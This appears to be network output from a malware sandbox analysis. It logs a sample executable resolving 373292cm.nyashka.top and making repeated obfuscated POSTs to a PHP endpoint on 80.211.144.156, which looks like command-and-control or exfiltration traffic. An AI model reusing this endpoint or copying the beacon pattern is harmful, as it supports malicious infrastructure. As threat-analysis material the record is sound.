                                                                    Aug 21, 2024 10:04:41.281644106 CEST5306080192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:41.286196947 CEST805306180.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:41.651758909 CEST5306180192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:41.656761885 CEST805306180.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:41.656781912 CEST805306180.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:41.656793118 CEST805306180.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:42.000904083 CEST805306180.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:42.052589893 CEST5306180192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:42.131247044 CEST805306180.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:42.177592039 CEST5306180192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:42.253839970 CEST5306180192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:42.254515886 CEST5306280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:42.552609921 CEST5306180192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:42.744524002 CEST805306280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:42.744545937 CEST805306180.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:42.744556904 CEST805306180.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:42.744638920 CEST5306280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:42.744676113 CEST5306180192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:42.744857073 CEST5306280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:42.749787092 CEST805306280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.099802971 CEST5306280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.104784012 CEST805306280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.104943037 CEST805306280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.104965925 CEST805306280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.131417036 CEST5306280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.131891012 CEST5306380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.136718035 CEST805306380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.138967991 CEST5306380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.139095068 CEST5306380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.143789053 CEST805306380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.176846027 CEST805306280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.203716040 CEST805306280.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.205338955 CEST5306280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.253479958 CEST5306480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.259737015 CEST805306480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.259851933 CEST5306480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.259960890 CEST5306480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.264749050 CEST805306480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.490190029 CEST5306380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.495126009 CEST805306380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.495189905 CEST805306380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.616795063 CEST5306480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.621881962 CEST805306480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.621922970 CEST805306480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.621968031 CEST805306480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.825052023 CEST805306380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.880739927 CEST5306380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:43.940027952 CEST805306480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.951148033 CEST805306380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:43.990350962 CEST5306480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:44.005901098 CEST5306380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:44.275019884 CEST805306480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:44.280909061 CEST805306480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:44.283538103 CEST5306480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:44.392801046 CEST5306380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:44.392870903 CEST5306480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:44.393524885 CEST5306580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:44.398329020 CEST805306380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:44.398376942 CEST805306580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:44.398387909 CEST805306480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:44.398432016 CEST5306380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:44.398448944 CEST5306580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:44.398471117 CEST5306480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:44.398610115 CEST5306580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:44.403369904 CEST805306580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:44.755855083 CEST5306580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:44.761029959 CEST805306580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:44.761048079 CEST805306580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:44.761058092 CEST805306580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:45.081003904 CEST805306580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:45.130836010 CEST5306580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:45.215542078 CEST805306580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:45.255728006 CEST5306580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:45.331753969 CEST5306580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:45.332379103 CEST5306680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:45.338082075 CEST805306680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:45.338300943 CEST5306680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:45.338320017 CEST805306580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:45.338376999 CEST5306580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:45.338490009 CEST5306680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:45.343290091 CEST805306680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:45.693414927 CEST5306680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:45.698402882 CEST805306680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:45.698421955 CEST805306680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:45.698432922 CEST805306680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:46.039570093 CEST805306680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:46.083864927 CEST5306680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:46.230125904 CEST805306680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:46.271421909 CEST5306680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:46.345501900 CEST5306680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:46.346230030 CEST5306780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:46.350733042 CEST805306680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:46.350810051 CEST5306680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:46.351017952 CEST805306780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:46.351089001 CEST5306780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:46.351188898 CEST5306780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:46.355986118 CEST805306780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:46.709491968 CEST5306780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:46.714607000 CEST805306780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:46.714760065 CEST805306780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:46.714792013 CEST805306780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:47.053410053 CEST805306780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:47.099566936 CEST5306780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:47.195375919 CEST805306780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:47.240418911 CEST5306780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:47.314363956 CEST5306780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:47.314946890 CEST5306880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:47.319865942 CEST805306780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:47.319891930 CEST805306880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:47.319957018 CEST5306780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:47.319983006 CEST5306880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:47.320100069 CEST5306880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:47.325509071 CEST805306880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:47.677755117 CEST5306880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:47.690016985 CEST805306880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:47.690041065 CEST805306880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:47.690071106 CEST805306880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.010880947 CEST805306880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.052615881 CEST5306880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.145291090 CEST805306880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.193258047 CEST5306880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.267713070 CEST5306880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.268326044 CEST5306980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.273061037 CEST805306880.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.273143053 CEST5306880192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.273161888 CEST805306980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.273237944 CEST5306980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.273353100 CEST5306980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.278179884 CEST805306980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.630986929 CEST5306980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.635973930 CEST805306980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.635993004 CEST805306980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.636003971 CEST805306980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.967870951 CEST805306980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.978615046 CEST5307080192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.981251955 CEST5306980192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.983535051 CEST805307080.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.983599901 CEST5307080192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.983721018 CEST5307080192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:48.988037109 CEST805306980.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.988612890 CEST805307080.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:48.988667965 CEST5306980192.168.2.780.211.144.156
                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Aug 21, 2024 10:03:01.970956087 CEST | 57757 | 53 | 192.168.2.7 | 1.1.1.1
                                                                    Aug 21, 2024 10:03:02.960694075 CEST | 57757 | 53 | 192.168.2.7 | 1.1.1.1
                                                                    Aug 21, 2024 10:03:03.353825092 CEST | 53 | 57757 | 1.1.1.1 | 192.168.2.7
                                                                    Aug 21, 2024 10:03:03.360971928 CEST | 53 | 57757 | 1.1.1.1 | 192.168.2.7
                                                                    Aug 21, 2024 10:03:31.825341940 CEST | 53 | 58802 | 1.1.1.1 | 192.168.2.7
                                                                    Aug 21, 2024 10:03:45.467075109 CEST | 53 | 61533 | 1.1.1.1 | 192.168.2.7
                                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                    Aug 21, 2024 10:03:01.970956087 CEST | 192.168.2.7 | 1.1.1.1 | 0xab78 | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
                                                                    Aug 21, 2024 10:03:02.960694075 CEST | 192.168.2.7 | 1.1.1.1 | 0xab78 | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false
                                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                    Aug 21, 2024 10:03:03.353825092 CEST | 1.1.1.1 | 192.168.2.7 | 0xab78 | No error (0) | 373292cm.nyashka.top | | 80.211.144.156 | A (IP address) | IN (0x0001) | false
                                                                    Aug 21, 2024 10:03:03.360971928 CEST | 1.1.1.1 | 192.168.2.7 | 0xab78 | No error (0) | 373292cm.nyashka.top | | 80.211.144.156 | A (IP address) | IN (0x0001) | false
                                                                    • 373292cm.nyashka.top
                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    0 | 192.168.2.7 | 49709 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:03.365466118 CEST | 328 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 344
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:04.058492899 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:04.154150009 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 1320
                                                                    Connection: keep-alive
                                                                    Aug 21, 2024 10:03:04.188143015 CEST | 304 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 384
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:04.402678013 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:04.699708939 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Aug 21, 2024 10:03:04.749056101 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:04.958807945 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:05.566585064 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    1 | 192.168.2.7 | 49712 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:04.329427958 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:05.021353006 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:05.157346010 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    2 | 192.168.2.7 | 49714 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:05.952052116 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:06.659027100 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:06.795371056 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:03:07.009253979 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    3 | 192.168.2.7 | 49718 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:07.106719971 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:07.458755970 CEST | 2544 | OUT | Data Raw: 5a 50 59 55 54 46 51 59 5b 5f 5a 51 59 54 58 5e 57 51 5d 5f 57 58 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZPYUTFQY[_ZQYTX^WQ]_WXSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./0?A" \# %]>.7(X:( #?#W#<V+_(40:8>&F$.Y/)
                                                                    Aug 21, 2024 10:03:07.817440987 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:07.955209970 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    4 | 192.168.2.7 | 49719 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:08.551778078 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:08.896136045 CEST | 2536 | OUT | Data Raw: 5f 5c 59 52 51 45 54 5a 5b 5f 5a 51 59 57 58 54 57 5f 5d 5e 57 51 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\YRQETZ[_ZQYWXTW_]^WQSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._/#(" #!Y*\+>&<47 1S?) %.>&F$.Y/)
                                                                    Aug 21, 2024 10:03:09.229041100 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:09.366518974 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    5 | 192.168.2.7 | 49724 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:10.670357943 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1852
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:11.021135092 CEST | 1852 | OUT | Data Raw: 5a 50 5c 51 51 42 54 5c 5b 5f 5a 51 59 57 58 5e 57 5e 5d 5f 57 59 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZP\QQBT\[_ZQYWX^W^]_WYS[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/#85=07 %>-X<*('#<4"/+\" 5\,>&F$.Y/
                                                                    Aug 21, 2024 10:03:11.345338106 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:11.481389999 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 56 28 35 03 00 27 28 33 0c 30 20 25 0d 2a 3d 38 01 3e 03 2a 04 30 01 25 17 25 3e 3c 50 33 3b 2a 03 3c 00 08 19 24 3f 0d 1e 2d 24 2b 5d 0c 13 22 15 34 04 35 04 24 3c 2c 5c 3e 2b 2f 17 21 3c 2a 59 2b 3a 3d 55 2b 01 38 58 3c 29 0d 59 3f 2a 2a 55 2e 28 04 02 2e 20 08 1e 34 14 2b 52 0d 11 24 10 2b 3d 25 1d 3d 2e 1a 01 22 06 27 58 33 3d 07 09 25 1c 2a 52 27 07 0e 1f 32 21 35 1f 33 57 29 12 25 3b 21 02 25 2c 3d 56 21 18 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &V(5'(30 %*=8>*0%%><P3;*<$?-$+]"45$<,\>+/!<*Y+:=U+8X<)Y?**U.(. 4+R$+=%=."'X3=%*R'2!53W)%;!%,=V!#T,"W3UV


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.2.7 | 49727 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:14.087327957 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:14.443074942 CEST | 2544 | OUT | Data Raw: 5f 5c 5c 52 51 40 54 59 5b 5f 5a 51 59 50 58 55 57 50 5d 59 57 5e 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\\RQ@TY[_ZQYPXUWP]YW^S\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.X/?6>7 !+-0?&<-[ 3#1?779_;>&F$.Y/
                                                                    Aug 21, 2024 10:03:14.767332077 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:14.897525072 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
